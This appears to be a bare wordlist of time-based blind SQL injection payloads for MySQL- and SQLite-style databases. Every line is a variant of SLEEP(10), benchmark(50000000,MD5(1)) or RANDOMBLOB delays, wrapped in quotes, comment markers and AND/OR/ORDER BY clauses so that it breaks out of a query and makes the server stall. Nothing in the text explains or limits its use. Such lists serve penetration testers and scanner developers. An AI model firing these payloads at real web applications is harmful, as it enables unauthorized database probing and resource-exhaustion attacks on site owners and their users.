(sleep 10)--
(sleep 10)
(sleep(10))--
(sleep(10))
-sleep(10)
SLEEP(10)#
SLEEP(10)--
SLEEP(10)="
SLEEP(10)='
";sleep 10--
";sleep 10
";sleep(10)--
";sleep(10)
";SELECT SLEEP(10); #
1 SELECT SLEEP(10); #
+ SLEEP(10) + '
&&SLEEP(10)
&&SLEEP(10)--
&&SLEEP(10)#
;sleep 10--
;sleep 10
;sleep(10)--
;sleep(10)
;SELECT SLEEP(10); #
'&&SLEEP(10)&&'1
' SELECT SLEEP(10); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(10)
ORDER BY SLEEP(10)--
ORDER BY SLEEP(10)#
AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
RANDOMBLOB(5000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
RANDOMBLOB(10000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(10000000000/2))))
